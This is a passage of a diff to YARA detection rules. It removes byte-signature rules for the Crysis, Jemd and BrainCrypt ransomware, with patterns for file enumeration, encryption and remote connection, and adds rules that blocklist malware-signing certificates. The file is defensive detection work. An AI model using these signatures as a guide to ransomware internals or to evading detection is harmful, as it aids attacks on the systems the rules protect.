category = "MALWARE" - tc_detection_type = "Ransomware" - tc_detection_name = "Crysis" - tc_detection_factor = 5 + category = "INFO" importance = 25 - strings: - $remote_connection_1 = { - 55 8B EC 83 EC ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C6 45 ?? ?? 6A ?? 6A ?? - 6A ?? FF 15 ?? ?? ?? ?? 89 45 ?? 6A ?? 6A ?? 8D 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? B9 - ?? ?? ?? ?? 66 89 4D ?? 6A ?? FF 15 ?? ?? ?? ?? 66 89 45 ?? 8B 55 ?? 52 FF 15 ?? ?? - ?? ?? 89 45 ?? 83 7D ?? ?? 0F 84 ?? ?? ?? ?? 83 7D ?? ?? 0F 84 ?? ?? ?? ?? C7 45 ?? - ?? ?? ?? ?? EB ?? 8B 45 ?? 83 C0 ?? 89 45 ?? 8B 4D ?? 8B 51 ?? 8B 45 ?? 83 3C 82 ?? - 74 ?? 8B 4D ?? 0F BF 51 ?? 52 8B 45 ?? 8B 48 ?? 8B 55 ?? 8B 04 91 50 8D 4D ?? 51 E8 - ?? ?? ?? ?? 83 C4 ?? 6A ?? 8D 55 ?? 52 8B 45 ?? 50 FF 15 ?? ?? ?? ?? 85 C0 75 ?? 6A - ?? 8B 4D ?? 51 FF 15 ?? ?? ?? ?? 50 8B 55 ?? 52 8B 45 ?? 50 FF 15 ?? ?? ?? ?? 6A ?? - 6A ?? 8D 4D ?? 51 8B 55 ?? 52 FF 15 ?? ?? ?? ?? 8B 45 ?? 50 FF 15 ?? ?? ?? ?? C7 45 - ?? ?? ?? ?? ?? EB ?? E9 ?? ?? ?? ?? 8B 45 ?? 8B E5 5D C3 - } - $enumerate_files = { - 55 8B EC 83 E4 ?? 81 EC ?? ?? ?? ?? 53 33 DB 81 7D ?? ?? ?? ?? ?? 56 57 89 5C 24 ?? - 0F 8D ?? ?? ?? ?? 68 ?? ?? ?? ?? 53 FF 15 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8B 7D ?? - 57 8B F0 FF 15 ?? ?? ?? ?? 3D ?? ?? ?? ?? 0F 8D ?? ?? ?? ?? 68 ?? ?? ?? ?? 57 6A ?? - 68 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 8E ?? ?? ?? ?? 8D 44 24 ?? 50 56 - FF 15 ?? ?? ?? ?? 89 44 24 ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? 8B 5D ?? 8D 4C 24 ?? 51 68 - ?? ?? ?? ?? 57 6A ?? 68 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 7E ?? F6 44 24 - ?? ?? 74 ?? 66 83 7C 24 ?? ?? 74 ?? 53 8D 54 24 ?? 52 8B D6 8B CF FF 55 ?? 85 C0 7E - ?? 8B 45 ?? 8B 4D ?? 40 50 53 51 56 E8 ?? ?? ?? ?? 83 C4 ?? EB ?? 53 8D 54 24 ?? 52 - 8B D6 8B CF FF 55 ?? 85 C0 7E ?? FF 44 24 ?? 8B 4C 24 ?? 8D 44 24 ?? 50 51 FF 15 ?? - ?? ?? ?? 85 C0 7F ?? 8B 54 24 ?? 52 FF 15 ?? ?? ?? ?? 8B 5C 24 ?? 56 6A ?? FF 15 ?? - ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 5F 5E 8B C3 5B 8B E5 5D C3 - } - $enumerate_resources = { - FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? - 8D 55 ?? 52 8B 45 ?? 50 8D 4D ?? 51 8B 55 ?? 52 FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? - ?? ?? C7 45 ?? ?? ?? ?? ?? EB ?? 8B 45 ?? 83 C0 ?? 89 45 ?? 8B 4D ?? 3B 4D ?? 0F 83 - ?? ?? ?? ?? 8B 55 ?? C1 E2 ?? 8B 45 ?? 83 7C 10 ?? ?? 75 ?? 8B 4D ?? 51 FF 15 ?? ?? - ?? ?? 8B 55 ?? C1 E2 ?? 8B 4D ?? 8B 75 ?? 8B 54 16 ?? E8 ?? ?? ?? ?? 85 C0 74 ?? 8B - 45 ?? 50 8B 4D ?? 51 8B 55 ?? C1 E2 ?? 8B 45 ?? 8B 4C 10 ?? 51 E8 ?? ?? ?? ?? 83 C4 - ?? 8B 55 ?? C1 E2 ?? 8B 45 ?? 8B 4C 10 ?? 83 E1 ?? 74 ?? 8B 55 ?? 52 8B 45 ?? 50 8B - 4D ?? 51 8B 55 ?? C1 E2 ?? 03 55 ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? E9 ?? ?? ?? ?? C7 45 - ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? E9 ?? ?? ?? ?? 8B 45 ?? 50 FF 15 ?? ?? ?? ?? 8D - 4D ?? 51 8B 55 ?? 52 6A ?? 6A ?? 6A ?? FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? C7 - 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8D 45 ?? 50 8B 4D ?? 51 8D 55 ?? 52 8B 45 ?? - 50 FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? EB ?? 8B 4D ?? 83 - C1 ?? 89 4D ?? 8B 55 ?? 3B 55 ?? 0F 83 ?? ?? ?? ?? 8B 45 ?? C1 E0 ?? 8B 4D ?? 83 7C - 01 ?? ?? 75 ?? 8B 55 ?? 52 FF 15 ?? ?? ?? ?? 8B 55 ?? C1 E2 ?? 8B 4D ?? 8B 75 ?? 8B - 54 16 ?? E8 ?? ?? ?? ?? 85 C0 74 ?? 8B 45 ?? 50 8B 4D ?? 51 8B 55 ?? C1 E2 ?? 8B 45 - ?? 8B 4C 10 ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 55 ?? C1 E2 ?? 8B 45 ?? 8B 4C 10 ?? 83 - E1 ?? 74 ?? 8B 55 ?? 52 8B 45 ?? 50 8B 4D ?? 51 8B 55 ?? C1 E2 ?? 03 55 ?? 52 E8 ?? - ?? ?? ?? 83 C4 ?? E9 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? E9 ?? ?? - ?? ?? 8B 45 ?? 50 FF 15 ?? ?? ?? ?? 5E 8B E5 5D C3 - } - $encrypt_files = { - 55 8B EC 81 EC ?? ?? ?? ?? 53 8B D8 33 C0 56 89 45 ?? 89 45 ?? 89 45 ?? 89 45 ?? 8B - 45 ?? 6A ?? 50 8D 4D ?? 51 8D 77 ?? C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 45 ?? 8B - D3 83 E2 ?? 2B DA 83 EB ?? 83 C4 ?? 89 5D ?? 8B 1D ?? ?? ?? ?? 50 FF D3 89 45 ?? 83 - F8 ?? 0F 84 ?? ?? ?? ?? 8B 4D ?? 51 FF D3 83 F8 ?? 0F 85 ?? ?? ?? ?? 8B 55 ?? 81 C2 - ?? ?? ?? ?? 81 FA ?? ?? ?? ?? 0F 83 ?? ?? ?? ?? 8B 45 ?? A8 ?? 74 ?? 83 E0 ?? 50 8B - 45 ?? 50 FF 15 ?? ?? ?? ?? 8B 4D ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 51 - FF 15 ?? ?? ?? ?? 8B D8 89 5D ?? 83 FB ?? 0F 84 ?? ?? ?? ?? 6A ?? 8D 55 ?? 52 33 C0 - 33 C9 51 50 53 89 45 ?? 89 45 ?? FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 83 7D ?? - ?? 75 ?? 83 7D ?? ?? 0F 84 ?? ?? ?? ?? 33 C9 51 8D 55 ?? 52 33 C0 50 51 53 FF 15 ?? - ?? ?? ?? 8B 45 ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? - 8B D8 83 FB ?? 0F 84 ?? ?? ?? ?? 8B 55 ?? 8B 4D ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? - 8B 55 ?? 8B 45 ?? 6A ?? 8D 4D ?? 51 52 57 50 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? - ?? 8B 4D ?? 85 C9 74 ?? 8B 45 ?? 85 C0 75 ?? 3B 4D ?? 73 ?? 8B D1 83 E2 ?? B8 ?? ?? - ?? ?? 2B C2 89 45 ?? 57 03 C1 8D 8D ?? ?? ?? ?? 57 51 E8 ?? ?? ?? ?? 8B 4D ?? 03 4D - ?? 83 C4 ?? 6A ?? 8D 55 ?? 52 51 57 53 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8B - 45 ?? 03 45 ?? 39 45 ?? 0F 85 ?? ?? ?? ?? 8B 55 ?? 8B 45 ?? 6A ?? 8D 4D ?? 51 52 57 - 50 FF 15 ?? ?? ?? ?? 85 C0 75 ?? E9 ?? ?? ?? ?? 6A ?? 6A ?? 57 E8 ?? ?? ?? ?? 8B 45 - ?? 83 C4 ?? C7 47 ?? ?? ?? ?? ?? C7 47 ?? ?? ?? ?? ?? 85 C0 74 ?? 8B 4D ?? 51 50 56 - C7 47 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 45 ?? 83 C4 ?? 03 F0 01 45 ?? 8B 55 ?? 6A ?? - 52 56 E8 ?? ?? ?? ?? 8B 45 ?? 6A ?? 50 83 C6 ?? 56 E8 ?? ?? ?? ?? 6A ?? 8D 4D ?? 51 - 83 C6 ?? 56 E8 ?? ?? ?? ?? 6A ?? 8D 55 ?? 52 83 C6 ?? 56 E8 ?? ?? ?? ?? 8B 45 ?? 68 - ?? ?? ?? ?? 50 83 C6 ?? 56 E8 ?? ?? ?? ?? 6A ?? 8D 4D ?? 51 83 EE ?? 56 E8 ?? ?? ?? - ?? 83 C4 ?? 6A ?? 8D 55 ?? 52 83 C6 ?? 2B F7 56 57 53 FF 15 ?? ?? ?? ?? 85 C0 74 ?? - 39 75 ?? 75 ?? 53 FF 15 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 53 FF 15 ?? ?? ?? ?? 83 7D - ?? ?? 7E ?? 8B 75 ?? 33 C9 51 8D 55 ?? 52 33 C0 50 51 56 FF 15 ?? ?? ?? ?? 56 FF 15 - ?? ?? ?? ?? 8B 5D ?? 53 FF 15 ?? ?? ?? ?? 83 7D ?? ?? 7E ?? 8B 45 ?? 8B 4D ?? 50 51 - FF 15 ?? ?? ?? ?? 8B 55 ?? 52 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 6A - ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B 45 ?? 5E 5B 8B E5 5D C3 - } - condition: - uint16(0)==0x5A4D and ($enumerate_resources and $enumerate_files and $encrypt_files and $remote_connection_1) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Yu Bao" and pe.signatures[i].serial=="18:b7:00:a3:19:aa:98:ae:71:b2:79:d4:e8:03:0b:82" and 1479686400<=pe.signatures[i].not_after) } -rule REVERSINGLABS_Win32_Ransomware_Jemd : TC_DETECTION MALICIOUS MALWARE FILE +import "pe" + +rule REVERSINGLABS_Cert_Blocklist_169138A86954Be1D9B264F47 : INFO FILE { meta: - description = "Yara rule that detects Jemd ransomware." + description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "ef981ffa-8801-50f0-9441-5f2bfcf44133" - date = "2020-07-15" - modified = "2020-07-15" + id = "56653f72-39af-50e7-9908-e516f9b21084" + date = "2023-11-08" + modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/ransomware/Win32.Ransomware.Jemd.yara#L1-L105" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "552e0fc118031e953dee2e7c6bf8234a5a90de8c34b0e2724dfe99f2b28b8c51" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L16926-L16942" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "1584e39b4e2025611bcb7bbbd92b97d25d12ddbb1e5c282db87730a03f7f56b1" score = 75 quality = 90 - tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" + tags = "INFO, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "MALWARE" - tc_detection_type = "Ransomware" - tc_detection_name = "Jemd" - tc_detection_factor = 5 + category = "INFO" importance = 25 - strings: - $find_files_1 = { - 55 8B EC 81 C4 ?? ?? ?? ?? 53 33 DB 89 9D ?? ?? ?? ?? 89 4D ?? 89 55 ?? 89 45 ?? 8B - 45 ?? E8 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 45 ?? E8 ?? - ?? ?? ?? 8D 85 ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? ?? - 64 FF 30 64 89 20 8B 45 ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? BA ?? ?? ?? ?? B8 ?? ?? - ?? ?? E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 83 E0 ?? 83 F8 ?? 75 - ?? 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 74 ?? 8B 85 ?? ?? ?? ?? BA ?? ?? - ?? ?? E8 ?? ?? ?? ?? 74 ?? 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 74 ?? 8B - 45 ?? 50 8B 45 ?? 50 8D 85 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 8B 55 ?? E8 ?? ?? ?? ?? 8B - 85 ?? ?? ?? ?? B1 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? - 85 C0 0F 84 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 C0 5A 59 59 64 89 10 68 - ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? E8 - ?? ?? ?? ?? 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 ?? E8 ?? ?? ?? ?? C3 - } - $find_files_2 = { - 55 8B EC 81 C4 ?? ?? ?? ?? 53 56 33 DB 89 9D ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 89 4D ?? - 89 55 ?? 89 45 ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? - ?? ?? 8D B5 ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 E8 ?? ?? ?? ?? 89 - C3 BB ?? ?? ?? ?? 56 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 4B 75 ?? 33 DB 8D 45 ?? 33 C9 BA - ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 C0 8A 14 1E 88 54 05 ?? 40 43 80 3C 1E ?? 74 ?? 83 F8 - ?? 7E ?? 43 8D 85 ?? ?? ?? ?? 8D 55 ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? - ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 74 ?? 8B 45 ?? 50 8D 85 ?? ?? ?? ?? 8D 55 ?? B9 ?? - ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 4D ?? 8B 55 ?? E8 ?? ?? ?? ?? 80 7C 1E - ?? ?? 75 ?? 80 3C 1E ?? 74 ?? 81 FB ?? ?? ?? ?? 0F 8E ?? ?? ?? ?? 33 C0 5A 59 59 64 - 89 10 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 ?? BA ?? - ?? ?? ?? E8 ?? ?? ?? ?? C3 - } - $encrypt_files_p1 = { - 55 8B EC 81 C4 ?? ?? ?? ?? 53 56 33 DB 89 9D ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 89 9D ?? - ?? ?? ?? 89 9D ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 8B D9 89 55 ?? 89 45 ?? 8B 45 ?? E8 ?? - ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8D - 85 ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 - 89 20 8B 45 ?? E8 ?? ?? ?? ?? 8B 55 ?? 80 7C 02 ?? ?? 75 ?? 8B 45 ?? E8 ?? ?? ?? ?? - 8B D0 4A 8D 45 ?? E8 ?? ?? ?? ?? FF 75 ?? 68 ?? ?? ?? ?? FF 75 ?? 8D 85 ?? ?? ?? ?? - BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? BA ?? ?? ?? ?? E8 - ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B D0 83 CA ?? 3B D0 75 ?? 80 - FB ?? 0F 85 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F 84 ?? ?? - ?? ?? 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8B 45 ?? 50 - 8B 45 ?? 50 FF 75 ?? 68 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? - ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B CB 8B 55 ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? FF - } - $encrypt_files_p2 = { - 75 ?? 68 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? - ?? 8B 85 ?? ?? ?? ?? 8B 4D ?? 8B 55 ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8B B5 ?? ?? ?? - ?? 8B C6 83 C8 ?? 3B C6 75 ?? 80 FB ?? 0F 85 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? BA ?? ?? - ?? ?? E8 ?? ?? ?? ?? 74 ?? 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 74 ?? 8B - 45 ?? 50 8B 45 ?? 50 FF 75 ?? 68 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA - ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B CB 8B 55 ?? E8 ?? ?? ?? ?? EB ?? FF - 75 ?? 68 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? - ?? 8B 85 ?? ?? ?? ?? 8B 4D ?? 8B 55 ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? - ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 C0 5A 59 59 64 89 10 - 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 8B - 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 ?? BA ?? - ?? ?? ?? E8 ?? ?? ?? ?? C3 - } - $main_routine = { - 8D 55 ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 55 ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 55 - ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 55 ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? B0 ?? E8 ?? - ?? ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? B2 ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? - ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 50 A1 ?? ?? ?? ?? 50 8D 55 ?? 66 - B8 ?? ?? E8 ?? ?? ?? ?? 8B 45 ?? B1 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? - E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? B9 ?? ?? ?? ?? 8B 15 ?? ?? ?? ?? - A1 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 ?? E8 ?? ?? ?? ?? FF 75 ?? 68 ?? ?? ?? ?? FF 35 - ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? - 8B 45 ?? 8D 55 ?? E8 ?? ?? ?? ?? 8B 55 ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 ?? 8B - 0D ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 55 ?? 8B C6 8B 08 FF 51 ?? 8D 55 ?? - 33 C0 E8 ?? ?? ?? ?? 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 55 ?? 8B C6 8B 08 FF - 51 - } - condition: - uint16(0)==0x5A4D and ($main_routine) and ( all of ($find_files_*)) and ( all of ($encrypt_files_p*)) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "BIG JOURNEY TECHNOLOGY LIMITED" and pe.signatures[i].serial=="16:91:38:a8:69:54:be:1d:9b:26:4f:47" and 1477636474<=pe.signatures[i].not_after) } -rule REVERSINGLABS_Win32_Ransomware_Braincrypt : TC_DETECTION MALICIOUS MALWARE FILE +import "pe" + +rule REVERSINGLABS_Cert_Blocklist_33412168Eeb3C0E4C7Dd0508A9Ffecd5 : INFO FILE { meta: - description = "Yara rule that detects BrainCrypt ransomware." + description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "190798d5-594d-5b80-aa0e-8d7ff167f1c0" - date = "2020-07-15" - modified = "2020-07-15" + id = "db2ae33e-d3af-5200-ad15-824e29434e2c" + date = "2023-11-08" + modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/ransomware/Win32.Ransomware.BrainCrypt.yara#L1-L121" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "85866d6ffa136bf3ed27bbab55ae5430af4a1363930ebacab0df9ad24f8734cb" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L16944-L16960" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "d634af0637c3349fe1718ee807b8a75007ab46b141494331901a22ce54e9fc5d" score = 75 quality = 90 - tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" + tags = "INFO, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "MALWARE" - tc_detection_type = "Ransomware" - tc_detection_name = "BrainCrypt" - tc_detection_factor = 5 + category = "INFO" importance = 25 - strings: - $get_files_for_encryption_32 = { - 64 8B 0D ?? ?? ?? ?? 8B 89 ?? ?? ?? ?? 3B 61 ?? 0F 86 ?? ?? ?? ?? 83 EC ?? 80 7C 24 - ?? ?? 74 ?? 8B 5C 24 ?? 89 1C 24 8B 5C 24 ?? 89 5C 24 ?? BB ?? ?? ?? ?? 89 5C 24 ?? - E8 ?? ?? ?? ?? 83 C4 ?? C3 83 3D ?? ?? ?? ?? ?? 0F 86 ?? ?? ?? ?? 8B 1D ?? ?? ?? ?? - 83 C3 ?? FC 8B 0B 89 0C 24 8B 4B ?? 89 4C 24 ?? 83 3D ?? ?? ?? ?? ?? 0F 86 ?? ?? ?? - ?? 8B 1D ?? ?? ?? ?? 83 C3 ?? 8D 7C 24 ?? FC 8B 0B 89 0F 8B 4B ?? 89 4F ?? E8 ?? ?? - ?? ?? 8B 5C 24 ?? 89 1D ?? ?? ?? ?? 8B 5C 24 ?? 80 3D ?? ?? ?? ?? ?? 75 ?? 89 1D ?? - ?? ?? ?? 8B 5C 24 ?? 89 1C 24 8B 5C 24 ?? 89 5C 24 ?? BB ?? ?? ?? ?? 89 5C 24 ?? E8 - ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 0C 24 8B 44 24 ?? C7 04 24 ?? ?? ?? ?? 89 4C 24 ?? 89 - 4C 24 ?? 89 44 24 ?? 89 44 24 ?? BB ?? ?? ?? ?? 89 5C 24 ?? C7 44 24 ?? ?? ?? ?? ?? - E8 ?? ?? ?? ?? 8D 5C 24 ?? FC 8B 0B 89 0C 24 8B 4B ?? 89 4C 24 ?? E8 ?? ?? ?? ?? E9 - ?? ?? ?? ?? BD ?? ?? ?? ?? 89 2C 24 89 5C 24 ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? E8 ?? - ?? ?? ?? 0F 0B E8 ?? ?? ?? ?? 0F 0B E8 ?? ?? ?? ?? E9 - } - $encrypt_file_32 = { - 64 8B 0D ?? ?? ?? ?? 8B 89 ?? ?? ?? ?? 3B 61 ?? 0F 86 ?? ?? ?? ?? 83 EC ?? 8B 5C 24 - ?? 89 1C 24 8B 5C 24 ?? 89 5C 24 ?? E8 ?? ?? ?? ?? 8B 54 24 ?? 8B 4C 24 ?? 8B 44 24 - ?? 89 54 24 ?? 89 14 24 89 4C 24 ?? 89 4C 24 ?? 89 44 24 ?? 89 44 24 ?? 8B 5C 24 ?? - 89 5C 24 ?? 8B 5C 24 ?? 89 5C 24 ?? 8B 5C 24 ?? 89 5C 24 ?? E8 ?? ?? ?? ?? 8B 54 24 - ?? 8B 4C 24 ?? 8B 44 24 ?? 8B 5C 24 ?? 89 1C 24 8B 5C 24 ?? 89 5C 24 ?? 89 54 24 ?? - 89 54 24 ?? 89 4C 24 ?? 89 4C 24 ?? 89 44 24 ?? 89 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? - E8 ?? ?? ?? ?? 83 C4 ?? C3 E8 ?? ?? ?? ?? E9 - } - $attach_to_server_32 = { - 64 8B 0D ?? ?? ?? ?? 8B 89 ?? ?? ?? ?? 3B 61 ?? 0F 86 ?? ?? ?? ?? 83 EC ?? 31 DB 89 - 5C 24 ?? 89 5C 24 ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 4C 24 ?? 89 CF 83 F9 ?? - 0F 84 ?? ?? ?? ?? 31 C0 E8 ?? ?? ?? ?? 89 4C 24 ?? 89 0C 24 83 3C 24 ?? 0F 84 ?? ?? - ?? ?? 8B 5C 24 ?? 89 5C 24 ?? 8B 5C 24 ?? 89 5C 24 ?? E8 ?? ?? ?? ?? 8B 5C 24 ?? 89 - 1C 24 83 3C 24 ?? 0F 84 ?? ?? ?? ?? BB ?? ?? ?? ?? 89 5C 24 ?? C7 44 24 ?? ?? ?? ?? - ?? E8 ?? ?? ?? ?? 8B 5C 24 ?? 89 1C 24 83 3C 24 ?? 0F 84 ?? ?? ?? ?? BB ?? ?? ?? ?? - 89 5C 24 ?? C7 44 24 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 5C 24 ?? 89 1C 24 83 3C 24 ?? - 0F 84 ?? ?? ?? ?? 8B 5C 24 ?? 89 5C 24 ?? 8B 5C 24 ?? 89 5C 24 ?? E8 ?? ?? ?? ?? 8B - 44 24 ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? 31 DB 89 5C 24 ?? 89 5C 24 ?? 31 ED 39 E8 0F 85 - ?? ?? ?? ?? B9 ?? ?? ?? ?? B8 ?? ?? ?? ?? 89 4C 24 ?? 89 0C 24 89 44 24 ?? 89 44 24 - ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 89 44 24 ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? 8B 48 ?? 8B 68 - ?? 89 6C 24 ?? 89 6C 24 ?? 89 4C 24 ?? 83 F9 ?? 0F 84 ?? ?? ?? ?? 8D 59 ?? C7 04 24 - ?? ?? ?? ?? 89 5C 24 ?? E8 ?? ?? ?? ?? 83 F8 ?? 0F 85 ?? ?? ?? ?? C7 04 24 ?? ?? ?? - ?? 8B 44 24 ?? 83 F8 ?? 74 ?? 83 C0 ?? 8D 7C 24 